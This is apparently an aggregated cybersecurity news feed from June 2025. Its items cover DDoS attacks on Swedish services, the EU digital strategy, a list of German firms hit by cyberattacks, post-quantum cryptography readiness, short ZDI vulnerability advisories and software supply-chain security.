Recently, several important Swedish services have been hit by distributed denial-of-service attacks: a few weeks ago it was Swish, before that it was Bank-id, and when the tax return period started in March, the DDoS guns were aimed at the Swedish Tax Agency. DDoS attacks are an interesting phenomenon that is often not easy to pinpoint on the scale between a prank and warfare, even when you know who is behind them. Sweden is not the only country affected either, last week the Netherlands Cyber Security Centre issued a statement saying that the pro-Russian hacktivist group NoName057(16) had launched a series of DDoS attacks against organizations in the country. The same group has also claimed several DDoS attacks in the UK. The usual DDoS attack can usually be traced back to so-called hacktivists, a kind of digital marauders who want to draw attention to a particular issue and create chaos and unrest. A DDoS attack is relatively easy and cheap to carry out; just a month ago Europol shut down a network of DDoS services that offered attacks for as little as 100 kroner. While these hacktivists often operate under some form of government wing, making them more than just the digital equivalent of “Restore the Wetlands”, I still think it makes sense to treat the DDoS attacks more as activists than as part of a hybrid war. Although they absolutely can be. Because without playing it down too much, the DDoS attacks are not doing much damage. Of course, it’s not good that Swish or Bank-id are down for a few hours, but it’s not a threat to society either. It bothers me a bit that there are always critics who go on and on about poor resilience, “our vulnerable digital society” and the risks of being so dependent on a few services. These things are important to talk about, but bringing them up in the context of these attacks is exactly what the hacktivists want. It also puts the focus and responsibility on the victims, even though they have done a pretty good job of protecting themselves. The services are back up and running. Few people blame the Swedish Transport Administration when the Essingeleden road jams because climate activists have glued themselves to the roadway, or the airport when the same group of activists prevents a plane from taking off from Malöga. But in some people’s eyes, it seems that those providing digital services need to spend their entire IT budget with Cloudflare to avoid criticism. Fortunately, Swedish mainstream media have gotten better at reporting on these things. Of course, there are blaring headlines and push notifications that the services are down, but I have also seen experts be called quite quickly to provide context. This makes it easier to avoid mass hysteria and for the activists to achieve their goals, if we are talking about resilience. Of course, we should take seriously, discuss, and deal with the fact that rogue states have the ability to disrupt services that are important to citizens. But in practice, it is best to handle the attacks like activists stuck on the E4 highway — you may find it annoying and perhaps get angry, but when the road reopens, you drive on. Stronger reactions than that only play into the hands of the “hacktivists”.

https://www.csoonline.com/article/3985995/digital-marauders-who-just-want-attention.html
Can the EU Lead the Global Digital Future? Here’s What the Strategy Says
2025-06-06T06:57:01Z | 1749193021

The European Commission and the High Representative for Foreign Affairs and Security Policy have jointly launched the European Union’s International Digital Strategy, laying out a comprehensive framework to guide the EU’s external digital engagement. The EU International Digital Strategy comes at a time when the global digital model is increasingly shaped by rapid technological advances and geopolitical challenges.  Framed as a roadmap for international cooperation and governance in the digital age, the strategy outlines the EU’s commitment to promoting secure, inclusive, and rules-based digital transformation around the world. It also reaffirms the alliance’s aim to position itself as a reliable and stable digital partner for both established allies and emerging economies.  EU International Digital Strategy: A Three-Pronged Strategic Framework  The EU’s new digital strategy is structured around three core objectives:  Expanding International Partnerships The EU aims to broaden its global digital footprint by deepening existing Digital Partnerships and Dialogues, initiating new alliances, and launching a Digital Partnership Network. This network will support bilateral and multilateral cooperation while also enhancing both the EU’s and its partners' digital resilience and competitiveness.  Deploying the EU Tech Business Offer A cornerstone of the strategy is the deployment of a tailored EU Tech Business Offer, a collaborative public-private initiative to support digital transformation in partner countries. This package will incorporate investments in AI, cybersecurity, digital public infrastructure, secure connectivity, and other critical technologies. The effort will be coordinated through the Team Europe approach, integrating Member State participation and financial instruments.  Strengthening Global Digital Governance The EU reaffirms its intention to lead in shaping a global, rules-based digital order. This includes advancing governance frameworks for emerging technologies, updating internet governance structures in line with developments like Web 4.0, and promoting human rights, democracy, and online safety standards globally.  Focus Areas for International Collaboration  Under the strategy, the EU will work with partner countries across several priority areas:  Secure and Trusted Digital Infrastructure Investments will support infrastructure critical to sectors such as health, finance, energy, and transport, aimed at fostering safe and dependable digital ecosystems.  Emerging Technologies Cooperation will include joint efforts on next-generation technologies, including artificial intelligence, 5G/6G networks, quantum computing, and advanced semiconductors.  Digital Governance The strategy places strong emphasis on regulatory models that uphold democratic values, social cohesion, and the protection of individual rights in digital environments.  Cybersecurity Efforts will focus on boosting the cyber defence capabilities of partner countries, which the EU sees as integral to its own digital security landscape.  Digital Identity and Public Infrastructure The EU seeks to advance interoperable digital identity systems and establish mutual recognition agreements to simplify cross-border interactions for businesses and citizens.  Online Platforms Ongoing priorities include safeguarding freedom of expression, ensuring online child protection, and supporting transparent digital ecosystems.  Expanding a Network of Digital Cooperation  The EU has already built a foundation for external digital engagement through a variety of platforms, including:  Over 30 digital and regional partnerships, Trade and Technology Councils, and thematic dialogues.  A strong digital trade ecosystem, with digital services trade valued at €3 trillion in 2024.  Major infrastructure projects like the 7,100 km-long Medusa cable across the Mediterranean, enhancing secure connectivity between Europe and North Africa.  The strategy’s public-private cooperation model aims to expand this existing infrastructure and strengthen regional connectivity.  Towards Rules-Based Digital Governance  One of the key messages of the strategy is the EU’s intent to uphold and promote a global digital environment anchored in democratic principles and international law. This includes:  Promoting regulatory standards for key digital technologies.  Advancing internet governance mechanisms to accommodate emerging technologies such as Web 4.0.  Supporting frameworks that ensure the global availability and integrity of the internet.  The EU’s vision emphasizes governance models that integrate both technological innovation and legal safeguards to protect users and institutions alike.  Background and Consultation Process  The strategy follows the European Council’s April 2024 directive calling for stronger EU leadership in digital affairs. In preparation, the European Commission issued a public call for evidence in May 2024, inviting feedback from a broad spectrum of stakeholders, including tech firms, civil society, academic institutions, trade bodies, and EU Member States.  This consultative approach aimed to incorporate diverse perspectives on how the EU can align its international digital policies with evolving geopolitical and technological trends.  Next Steps  Following today’s announcement, the Commission and the High Representative plan to present the strategy in a series of stakeholder events across EU institutions and partner countries. These sessions will serve as platforms to discuss implementation frameworks and mobilize the necessary public and private support to operationalize the proposed initiatives.  Implementation is expected to begin immediately after these consultations, with a focus on translating policy into practical cooperation projects and regulatory models.

https://thecyberexpress.com/eu-international-digital-strategy/
Hackers Exploit Roundcube Vulnerability to Steal User Credentials via XSS Attack
2025-06-06T06:43:10Z | 1749192190

A recent spearphishing campaign targeting Polish entities has been attributed with high confidence to the UNC1151 threat actor, a group linked to Belarusian state interests and, according to some sources, Russian intelligence services. CERT Polska reports that the attackers leveraged a critical vulnerability in the Roundcube webmail platform—CVE-2024-42009—to steal user credentials with minimal user interaction. […] The post Hackers Exploit Roundcube Vulnerability to Steal User Credentials via XSS Attack appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

https://gbhackers.com/hackers-exploit-roundcube-vulnerability/
Diese Unternehmen hat es schon erwischt
2025-06-06T06:35:00Z | 1749191700

Lesen Sie, welche Unternehmen in Deutschland aktuell von Cyberangriffen betroffen sind.Roman Samborskyi | shutterstock.com Sie denken, Ihre Sicherheitsmaßnahmen können Sie langfristig vor Cyberangriffen schützen? Oder dass Ihr Unternehmen zu klein und damit uninteressant für Hacker ist? Egal, ob Sie dem Mittelstand angehören, an der Börse gelistet sind oder zu den kritischen Infrastrukturen gehören: Jedes Unternehmen hat Daten, die Cyberkriminelle stehlen möchten. Im Jahr 2024 wurden viele deutsche Unternehmen Opfer einer Cyberattacke. Die Folgen der Angriffe, die meist mittels Ransomware erfolgten, waren Betriebsstörungen gefolgt von Umsatzeinbußen, hohe Kosten für die Datenwiederherstellung sowie Reputationsschäden. Auch für 2025 ist die Gefahr durch Cyberkriminelle hoch. Diese deutschen Unternehmen wurden bisher attackiert: UnternehmenWannWasQuelleUnterwegs Outdoor ShopJuni 2025CSOWellteamMai/Juni 2025CSOVolkswagen GroupJuni 2025RansomwareCSOFunktel GmbHJuni 2025Ransomwarewww.ransomware.liveArcona Hotels & Resorts-GruppeMai 2025RansomwareCSOAdidasMai 2025CSOArla Foods Deutschland Mai 2025CSOROS RollentechnikMai 2025Ransomwarewww.ransomware.liveAutohaus JürgenMai 2025come-on.deRichard Scholz GmbH (BVG-Dienstleister)April/Mai 2025Datendiebstahl (BVG-Kundendaten)CSOReutlinger General-AnzeigerMai 2025Reutlinger General-AnzeigerOettingerApril 2025RansomwareCSOguenstiger.deApril 2025RansomwareCSOJ. Dahmen GmbH & Co. KG (JDC)April 2025DSGV-PortalRheinmetallApril 2025Ransomwarewww.ransomware.liveFAKO-M GetränkeApril 2025FAKO-M GetränkeSamsung Deutschland April 2025Datendiebstahl (Angriff über IT-Dienstleister Spectos)CSOHofmann Fördertechnik März 2025Ransomware?CSOHeilbronn MarketingMärz 2025RansomwareCSOFKM ElementeMärz 2025Ransomwarewww.ransomware.liveSozial-Holding MönchengladbachMärz 2025RansomwareCSOAerticketMärz 2025Ransomware?CSOQ railingMärz 2025Ransomwarewww.ransomware.liveStadtwerke SchwerteMärz 2025CSOWillms FleischFebruar 2025RansomwareCSOSüdkabelFebruar 2025suedkabel.deMETA E²F OperationsFebruar 2025RansomwareDSGVO-PortalAutohaus KießlingFebruar 2025RansomwareFalconFeeds.ioStürmer MaschinenFebruar 2025RansomwareCSOInSystFebruar 2025RansomwareCSOPamyraFebruar 2025RansomwareDSGVO-PortalVorwerkFebruar 2025DatendiebstahlCSOEscadaFebruar 2025RansomwareCSOEckert & ZieglerFebruar 2025www.ezag.com3 Screen SolutionsFebruar 2025UndercodenewsHEMIFebruar 2025RansomwareDSGVO-PortalAlltoursFebruar 2025AlltoursNeovita CosmeticsJanuar 2025RansomwareDSGVO-PortalWürttemberger MedienJanuar 2025RansomwareDSGVO-PortalSchauinsland ReisenJanuar 2025CSOGrohe AGJanuar 2025RansomwareCSOD-TrustJanuarZugriff auf DatenCSOTelering MarketingJanuar 2025RansomwareRansomware.liveWeininger Metall SystemJanuar 2025RansomwareCSO Diese Unternehmen wurden im Jahr 2024 Opfer einer Cyberattacke: UnternehmenWannWasQuelleVosskoNovember 2024RansomwareCSOAEPOktober 2024RansomwareCSOIDEAOktober 2024RansomwareCSOSchweiger TransportOktober 2024RansomwareRansomware.liveHuber GroupOktober 2024 Celleheute.deSchäfer dein BäckerSeptember 2024RansomwareCSODiehl DefenceSeptember 2024SpywareCSOSchumag AGSeptember CSOClatronic InternationalSeptember 2024RansomwareRansomware.liveCBTSeptember 2024RansomwareRansomware.liveSybitAugust 2024PhishingCSOOptibeltAugust 2024 CSOMelchersJuli 2024RansomwareCSOSunExpressJuli 2024 CSOMittelbadische Entsorgungs- und Recyclingbetriebe (MERB)Juli 2024 CSOEurostrandJuli 2024Ransomware?CSOTÜV Rheinland AkademieJuli 2024RansomwareCSOLambertzJuni 2024RansomwareCSOMeiller KipperJuni 2024 https://www.meiller.com/de/wichtige-information/DG Immobilien ManagementJuni 2024 CSOWestfälische StahlgesellschaftJuni 2024Ransomwarehttps://www.ws-stahl.de/faq-zum-cyberangriff-vom-9-juni-2024/HoppeckeAnfang Juni 2024RanomwareCSOLemkenMai 2024 CSODeutsche TelekomMai 2024Ransomware?CSOMelting MindApril 2024RansomwareCSOMax WildApril 2024 https://www.maxwild.com/unternehmen/news/cyberangriff-auf-max-wild-gmbh/Bieler + LangApril 2024 bieler-lang.deHospitaltechnik PlanungsgesellchaftApril 2024 https://www.ht-hospitaltechnik.de/news/391-aktueller-cybervorfall-bei-der-ht.htmlGBI-Genios Deutsche WirtschaftsdatenbankApril 2024 CSOThyssenkruppFebruar 2024 CSOPSI SoftwareFebruar 2024 CSOKind HörgeräteFebruar 2024 CIOVartaFebruar 2024 CSOAnydeskFebruar 2024 CSOUnfallkasse ThüringenDezember 2023/ Januar 2024RansomwareCSOODAV AGJanuar 2024 CSOTransdevJanuar 2024 CIO Diese Unternehmen wurden im Jahr 2023 Opfer eines Hackerangriffs: UnternehmenWannWasQuelleJunghans-Wolle/ Pro IdeeDezember 2023RansomwareCSOAllgaier AutomotiveDezember 2023 filstalwelle.deErfo BekleidungswerkDezember 2023RansomwareCSOKaDeWeNovember 2023RansomwareCSOBauer AG  CIOSüdwestfalen ITOktober 2023RansomwareCSOMotel OneOktober 2023RansomwareCSOHäffnerOktober 2023RansomwareExplodingsecurityHochsauerlandWasser, Hochsauerland EnergieSeptemberr/Oktober 2023RansomwareCSOdegenia Versicherungsdienst AGSeptember/Oktober 2023 CSOMedgateAugust/September 2023 MedgateKendrion Kuhnke MalenteAugust 2023 CSOTrinkwasserverband StadeAugust 2023 CSOWildeboerJuli 2023RansomwareCSOSoftProjektJuli 2023RansomwareSoftProjektIT-Dienstleister der BarmerJuni 2023Software-SchwachstelleCSOVerivoxJuni 2023Software-SchwachstelleCSOMedizinischer DienstJuni 2023 CSODeutsche LeasingJuni 2023 CSOVerlagsgruppe VRMEnde Mai 2023 CSOHosting-Dienstleister von DenaMai 2023RansomwareCSOUnited HosterMai 2023RansomwareCSODienstleister von Heineking MediaMai 2023 CSOBlack Cat NetworksMai 2023RansomwareCSOGITAIMai 2023RansomwareCSOMaxim GroupAnfang Mai2023RansomwareCSOLux Automation RansomwareCSOBilstein GruppeEnde April 2023RansomwareCSOStürtz Maschinenbau22. April 2023RansomwareDSGVO PortalBadische Stahlwerke20. April 2023 CSOJobrad RansomwareCSOBitmarckApril 2023 CSOLürssenApril 2023RansomwareCSOEvotec6. April 2023 CIOÜstra31. März 2023 CSOBIG direkt28. März 2023 Ruhr NachrichtenMaterna25. März 2023 CSOSAF HollandMärz 2023 CIOMatthäi17. März 2023RansomwareCSOEnergieversorgung Filstal13. März 2023DDoSCSORheinmetall, NW7. März 2023DDoSCIOSteico, BY1. März 2023n.a.CSOSmart InsurTech, BE10. Februar 2023n.a.Smart InsurTechAlbert Ziegler, BW9. Februar 2023n.a.CSOUnternehmen in Bayern, BY6. Februar 2023RansomwarePolizei BayernKapellmann und Partner Rechtsanwälte, NW3. Februar 2023RansomwareKapellmannHäfele, BW2. Februar 2023RansomwareCSOStadtwerke Karlsruhe, BW1. Februar 2023RansomwareCSODürr, BWFebruar 2023n.a.CSOBayerischer Rundfunk, BYFebruar 2023PhishingCSOGeze, BWFebruar 2023n.a.GezeWisag Dienstleistungsholding, HEFebruar 2023n.a.Frankfurter Allgemeine ZeitungFlughafen Hamburg, HH25. Januar 2023DDoSHamburger AbendblattPlüsch-Tierheim, NW24. Januar 2023n.a.CSOSky Deutschland, BY21. Januar 2023n.a.Digital FernsehenBitmarck, NW19. Januar 2023n.a.CSOFritzmeier Group, BY17. Januar 2023n.a.CSOAdesso, NW11. Januar 2023n.a.CSOUnternehmen in Kaiserslautern, RPJanuar 2023Social EngineeringCSO Diese Unternehmen wurden im Jahr 2022 Opfer einer Cyberattacke: UnternehmenWannWasQuelleIBB Business Team, BE27. Dezember 2022RansomwareIBB Business TeamSSI Schäfer Shop, RP23. Dezember 2022n.a.Schäfer Shop LinkedInThyssenkrupp, NRW  20. Dezember 2022n.a.CSOH-Hotels, HE11. Dezember 2022n.a.H-HotelsMeyer & Meyer, NI6. Dezember 2022n.a.CSORosenschon Partnerschaft, BY5. Dezember 2022n.a.Bayreuter TagblattDeutsche Klassenlotterie Berlin, BEDezember 2022n.a.Berliner KurierLand Brandenburg Lotto, BBDezember 2022n.a.RBB 24Lotto-Toto Sachsen-Anhalt, STDezember 2022n.a.MDRNordwest Lotto Schleswig-Holstein, SHDezember 2022n.a.FocusLotto Rheinland-Pfalz, RPDezember 2022n.a.SWRTechnolit, HEDezember 2022n.a.Technolit FacebookT-Mobile, NW25. November 2022n.a.CSOLandau Bedia, BE25. November 2022n.a.Landau MediaBisping & Bisping, BY17. November 2022n.a.Nürnberger NachrichtenRichard Wolf, BW3. November 2022RansomwareRichard WolfProphete, NWNovember 2022n.a.CSOOase, NRW29. Oktober 2022n.a.OaseAurubis, HH28. Oktober 2022n.a.CIOEnercity, NI26. Oktober 2022n.a.CIODeutsche Presse Agentur, HH17. Oktober 2022RansomwareCSOMetro, NRW17. Oktober 2022n.a.CSOHeilbronner Stimme, BW14. Oktober 2022RansomwareCIOWilken Software Group, BW12. Oktober 2022RansomwareCSOConvista, NRW10. Oktober 2022Zero DayConvistaHipp, BY5. Oktober 2022n.a.BR24Caritasverband München und Freising, BY11. September 2022RansomwareCSOElabs, HE8. August 2022n.a.ElabsMedi, BY7. August 2022n.a.CSOIHK, deutschlandweit4. August 2022DDoSCSOSemikron, BY1. August 2022RansomwareCSOContinental, NIAugust 2022n.a.CIOAutodoc, BEAugust 2022n.a.Skoda CommunitySaller-Bau, THAugust 2022n.a.Thüringer AllgemeineIsta, NW27. Juli 2022n.a.CSOASG, NI26. Juli 2022n.a.CSOWeidmüller, NW18. Juli 2022n.a.Neue WestfälischeHelinet, NW7. Juli 2022DDoSWestfälischer AnzeigerKnauf, BY29. Juni 2022n.a.KnaufBizerba, BW27. Juni 2022n.a.Schwarzwälder BoteApetito, NW26. Junin.a.CSOCount + Care, HE12. JuniRansomwareWissenschaftsstadt DarmstadtBauverein, HE12. JuniRansomwareFrankfurter RundschauHeag und Heag Mobilo, HE12. Juni 2022RansomwareFrankfurter RundschauFES, HE12. Juni 2022RansomwareCIOEntega, HE12. Juni 2022RansomwareCSOStadtreinigung Kassel, HE2. Juni 2022n.a.WeltSDZ Druck und Medien, BW31. Mai 2022n.a.Schwäbische PostJakob Becker, RP24. Mai 2022RansomwareCSOPosteo, BE17. Mai 2022DDoSCSOAGCO, BY5. Mai 2022RansomwareAGCOLudwig Freytag,NIMai 2022RansomwareNDRCWS, NWMai 2022n.a.Westfalen BlattSixt, BY29. April 2022n.a.CSODonau Stadtwerke Dillingen-Lauingen, BY18. April 2022n.a.Augsburger AllgemeineReitzner, BY18. April 2022n.a.Augsburger AllgemeineAHS, HH17. April 2022n.a.AirlinersIMA Schelling Group, NW15. April 2022n.a.Neue WestfälischeDeutsche Windtechnik, HB12. April 2022RansomwareCSOPerbit, NW7. April 2022RansomwareCSOKSB, ST7. April 2022n.a.MDRFraunhofer-Institut, STApril 2022RansomwareCSOTÜV Nord Group, NIApril 2022n.a.TÜV Nord GroupNordex, HH31. März 2022n.a.NordexWelcome Hotels, HE12. März 2022n.a.Welcome HotelsStollwerck, TH11. März 2022n.a.MDRElobau, BW4. März 2022RansomwareElobauBauking, NW3. März 2022RansomwareWestfalenpostRosneft, BEMärz  2022n.a.WeltTST, RPMärz 2022n.a.SWRTrützschler, NWMärz 2022RansomwareWDRFunke Mediengruppe, NW25. Februar 2022BotsDie ZeitKlopotek, BE18. Februar 2022RansomwareCSOSchultze & Braun Rechtsanwaltsgesellschaft, BW16. Februar 2022Zero DaySchultze & BraunOtto Dörner, HHFebruar 2022RansomwareSVZWisag Dienstleistungsholding, HE27. Januar 2022n.a.WisagGolfclub Hofgut Praforst, HE23. Januar 2022Ransomware­­­Osthessen NewsThalia Bücher, NW20. Januar 2022Brute ForceTarnkappeUnfallkasse Thüringen, TH4. Januar 2022RansomwareUnfallkasse ThüringenOiltanking GmbH, HHJanuar 2022n.a.Handelsblatt Die Redaktion wird diese Listen regelmäßig aktualisieren. Jedoch erheben wir keinen Anspruch auf Vollständigkeit.

https://www.csoonline.com/article/3577944/diese-unternehmen-hats-schon-erwischt.html
Transform Your Old Smartphone into a Pocket Cyberdeck with Kali NetHunter
2025-06-06T06:23:11Z | 1749190991

In an age where laptops are getting slimmer and smartphones more powerful, there’s still a niche for compact, dedicated computing devices that offer the best of both worlds. Say hello to the NetHunter C-deck, a brilliant DIY project by s.gordienko that transforms an older Google Pixel 3 XL into a highly portable, clamshell-style palmtop. You […] The post Transform Your Old Smartphone into a Pocket Cyberdeck with Kali NetHunter first appeared on Mobile Hacker.

https://www.mobile-hacker.com/2025/06/06/transform-your-old-smartphone-into-a-pocket-cyberdeck-with-kali-nethunter/
CISOs urged to push vendors for roadmaps on post-quantum cryptography readiness
2025-06-06T06:00:00Z | 1749189600

CISOs have been urged to demand clear post-quantum cryptography (PQC) readiness roadmaps from vendors and partners to combat the looming threat of cryptographically relevant quantum computers. Quantum computers capable of large-scale cryptographic attacks are yet to be developed but recent advances mean the threat is moving from theoretical to near-term reality, possibly within five years. During a panel at this week’s Infosecurity Europe conference, experts urged security professionals to begin transitioning to PQC sooner rather than later, alongside calls to focus on supply chain readiness. Sufficiently powerful quantum computers would be capable of breaking current asymmetric encryption, undermining the security protections underpinning the security of financial transactions, sensitive data, and secure communications. Even in advance of the arrival of sufficiently capable quantum computer (an event sometimes described as Q-Day), adversaries could carry out harvest now, decrypt later attacks. Preparing for Q-Day Organizations, especially those handling long-duration secrets, and sectors such as finance, critical infrastructure, healthcare, and telecommunications are most at risk, the Infosecurity Europe panel agreed. Karl Holmqvist, founder and chief executive of Lastwall, a provider of quantum-resilient cybersecurity products, told delegates that Q-Day will not be announced and businesses need to take action now in the face of a growing threat. “An orderly transition will cost less than emergency planning,” Holmqvist said. “It’s like Y2K but without an actual date.” Encryption methods such as RSA and ECC are considered unbreakable by classical computers because breaking them relies on factoring the products of large prime numbers or comparable tasks. Based on a fundamentally different computing architecture than classical computers, quantum computers, however, are capable of solving problems intractable to even the most powerful supercomputers, such as breaking widely used encryption methods. The threat has driven the development of quantum-resistant cryptography algorithms. The US National Institute of Standards and Technology (NIST) approved three post-quantum cryptography (PQC) standards last year for applications including digital signatures and key exchange. Organizations need to update their cryptographic systems, libraries, and hardware (such as hardware security modules) to support the new standards. The UK’s National Cyber Security Centre (NCSC) has published guidance for phased migration to quantum-secure systems by 2035. Examples of early adoption include Google’s quantum-safe digital signatures in Cloud KMS (key management services) and Cloudflare’s commitment to integrate the new PQC standards into their services, but much remains a work in progress. The IETF is working on revising and standardizing key internet protocols — such as TLS, SSH, and VPNs — to support PQC algorithms, which generally have longer key sizes and tougher performance characteristics. Some vendors are introducing hybrid PKI solutions to ensure backward compatibility and smooth migration to PQC. “CISOs need to start asking vendors if they are PQC-ready,” Holmqvist advised. Daniel Cuthbert, global head of cybersecurity research at Santander, argued quantum advancements are forcing organizations to ask critical questions about where and how cryptography is used, an often overlooked task. Quantum can be used as the stick that will allow security professionals to get approval to carry out a cryptographic inventory at their organization, alongside projects that will allow them to improve their cryptographic agility more generally, Cuthbert advised. As a first step organizations can prepare a cryptographic bill of materials to audit the use of encryption technologies by their organization. No ‘forklift upgrade’ needed There is a misconception that change is difficult but the task of modernizing systems to make them PQC-ready can be broken down into chunks, advised Anne Leslie, cloud risk and controls leader for EMEA at IBM. “Businesses can only go as fast as partners and suppliers,” Leslie cautioned. Madelein van der Hout, senior analyst at Forrester, who was not on the panel, told CSO that organizations should start to prepare for post-quantum cryptography over a five-year horizon. Van der Hout acknowledged that businesses have many priorities to balance so the speed of adoption should be aligned to their risk tolerance, internal business goals, and wider strategy. For a look at how to get started, see “The CISO’s guide to establishing quantum resilience.”

https://www.csoonline.com/article/4002749/cisos-urged-to-push-vendors-for-roadmaps-on-post-quantum-cryptography-readiness.html
71% of Organizations Cannot Cover the Cloud Environment With Current Tools
2025-06-06T05:00:00Z | 1749186000

As cloud infrastructure increases in complexity, security teams are having difficulty keeping pace.

https://www.securitymagazine.com/articles/101675-71-of-organizations-cannot-cover-the-cloud-environment-with-current-tools
ZDI-25-326: (0Day) (Pwn2Own) WOLFBOX Level 2 EV Charger MCU Command Parsing Misinterpretation of Input Remote Code Execution Vulnerability
2025-06-06T05:00:00Z | 1749186000

This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installatons of WOLFBOX Level 2 EV Charger devices. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.0. The following CVEs are assigned: CVE-2025-5747.

http://www.zerodayinitiative.com/advisories/ZDI-25-326/
ZDI-25-327: (0Day) (Pwn2Own) WOLFBOX Level 2 EV Charger LAN OTA Exposed Dangerous Method Remote Code Execution Vulnerability
2025-06-06T05:00:00Z | 1749186000

This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of WOLFBOX Level 2 EV Charger. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The ZDI has assigned a CVSS rating of 8.0. The following CVEs are assigned: CVE-2025-5748.

http://www.zerodayinitiative.com/advisories/ZDI-25-327/
ZDI-25-328: (0Day) (Pwn2Own) WOLFBOX Level 2 EV Charger BLE Encryption Keys Uninitialized Variable Authentication Bypass Vulnerability
2025-06-06T05:00:00Z | 1749186000

This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of WOLFBOX Level 2 EV Charger devices. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 6.3. The following CVEs are assigned: CVE-2025-5749.

http://www.zerodayinitiative.com/advisories/ZDI-25-328/
ZDI-25-329: (0Day) (Pwn2Own) WOLFBOX Level 2 EV Charger tuya_svc_devos_activate_result_parse Heap-based Buffer Overflow Remote Code Execution Vulnerability
2025-06-06T05:00:00Z | 1749186000

This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of WOLFBOX Level 2 EV Charger. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2025-5750.

http://www.zerodayinitiative.com/advisories/ZDI-25-329/
ZDI-25-330: (0Day) (Pwn2Own) WOLFBOX Level 2 EV Charger Management Card Hard-coded Credentials Authentication Bypass Vulnerability
2025-06-06T05:00:00Z | 1749186000

This vulnerability allows physically present attackers to bypass authentication on affected installations of WOLFBOX Level 2 EV Charger. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 4.6. The following CVEs are assigned: CVE-2025-5751.

http://www.zerodayinitiative.com/advisories/ZDI-25-330/
ZDI-25-331: Autodesk Revit RFA File Parsing Use-After-Free Remote Code Execution Vulnerability
2025-06-06T05:00:00Z | 1749186000

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Autodesk Revit. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-5036.

http://www.zerodayinitiative.com/advisories/ZDI-25-331/
Conducting Background Checks in the Corporate Security Environment
2025-06-06T04:00:00Z | 1749182400

As data privacy grows stronger, it becomes harder for security leaders to perform thorough background checks.

https://www.securitymagazine.com/articles/101668-conducting-background-checks-in-the-corporate-security-environment
Cybersecurity in der Lieferkette: Wie Sie Ihre Software-Supply-Chain schützen
2025-06-06T03:17:00Z | 1749179820

Um Ihre Software-Lieferkette zu schützen, kann Generative AI sehr hilfreich sein.NTPY -Shutterstock.com Es klingt wie ein Agentenkrimi: Unbekannten Drahtziehern ist es gelungen, eine Hintertür in der XZ-Kompressionsbibliothek, Teil vieler Open-Source-Plattformen, zu verstecken. Kompromittierte XZ-Bibliotheken können wiederum Secure-Shell (SSH) gefährden, das am häufigsten verwendete Tool für einen sicheren Fernzugriff. Potenziell sind sehr viele Server im Internet von der im Frühjahr 2024 entdeckten Lücke betroffen, weswegen das Bundesamt für Sicherheit in der Informationstechnik (BSI) im ersten Schritt genaue Prüfungen und die Installation der neuesten Sicherheits-Updates empfiehlt. Auch wenn die Security-Community nun umso wachsamer ist, gibt es für eine generelle Entwarnung keinen Grund. Solche elaborierten Supply-Chain-Attacken sind keine Seltenheit mehr. Die Software-Lieferketten stehen deshalb zunehmend unter Druck und eine einzelne Schwachstelle bei einem Player kann eine ganze Reihe weiterer Beteiligter treffen. Vor allem kleine Softwarehäuser können ins Visier der Angreifer geraten – nicht etwa, weil sie selbst interessant sind, sondern weil sie namhafte Unternehmen als Kunden haben. Auch deutsche Unternehmen sehen mittlerweile die drohende Gefahr: Laut der aktuellen GenAI-Studie von Elastic nehmen 97 Prozent aller befragten Unternehmen eine deutliche Gefährdung wahr und sehen sich Herausforderungen bezüglich ihrer IT-Sicherheit gegenüber. Doch wie können Unternehmen ihren Schutz vor solchen Angriffen verbessern? Der Schlüssel zu mehr Sicherheit: verhaltensbasierte Erkennung Maschinelles Lernen (ML) spielt in der Cybersecurity eine zunehmend größere Rolle. Wird hier zum Beispiel verhaltensbasierte Erkennung eingesetzt, kann das Verhalten aller im System laufenden Prozesse untersucht werden. Im Fokus steht dabei etwa, mit welchen anderen Prozessen sie Verbindungen herstellen oder welche Dateien sie öffnen. Schließlich können sie auch als gut- oder bösartig beurteilt werden. So werden die Daten aus verschiedenen verdächtigen Einzelaktivitäten zusammengefügt, verbunden mit der Feststellung, dass sie alle zu einem einzigen Angriff gehören. Hier kommt auch künstliche Intelligenz (KI) ins Spiel: Denn mit der Hilfe von maschinellem Lernen und Generative AI (GenAI) erhöht sich die Chance weiter, einzelne schwache Signale zu erkennen und zu sammeln. Jedes für sich genommen ist nicht bösartig genug, um einen Alarm auszulösen, aber kollektiv sind sie es – genau das definiert die Angriffserkennung als Muster. GenAI kann also in diesem Umfeld ein sehr nützliches Werkzeug sein. Das sehen auch die Teilnehmer der Elastic-Studie so: 100 Prozent der befragten deutschen Unternehmen geben an, dass sie generative KI innerhalb ihrer Security-Teams einsetzen wollen. Gerade in Verbindung mit ML kann generative KI bei einer Vielzahl von Aufgaben unterstützen – von der Untersuchung von Alerts über das Reagieren auf Sicherheitsvorfälle bis hin zum Generieren und Konvertieren von Suchanfragen mit Hilfe natürlicher Sprache. Je nach Tool unterstützen einfache integrierte Prompts bei der Anwendung ebenso wie selbst formulierte Prompts, die über das hinausgehen, was die integrierten Funktionen bieten. Vorbereitung ist das A und O Eine wichtige Abwehrlinie gegen Supply-Chain-Angriffe sind die Unternehmen selbst. Eine wirksame firmeninterne Cybersecurity setzt sich dabei aus vier Komponenten zusammen: Organisation, Prozesse, Menschen und Technologie. Zuerst braucht es einen ganzheitlichen Sicherheitsansatz im Unternehmen, der alle diese Aspekte von Anfang an berücksichtigt. Die primäre Aufgabe eines CISO ist es deshalb, die Cybersecurity umfassend im Auge zu behalten. Es müssen nicht nur konkrete Sicherheits-Prozesse aufgebaut, sondern auch Mitarbeiter geschult sowie für aktuelle Cyber-Bedrohungen sensibilisiert werden. So wurde etwa in dem Angriff auf XZ auch mit Social-Engineering-Methoden gearbeitet, um zum Beispiel den Maintainer der Bibliothek unter Druck zu setzen. In technischer Hinsicht sind eine einheitliche Datenplattform und der kombinierte Einsatz von maschinellem Lernen und generativer KI von zentraler Bedeutung. Lesetipp: Wie GenAI das Threat Hunting beschleunigt 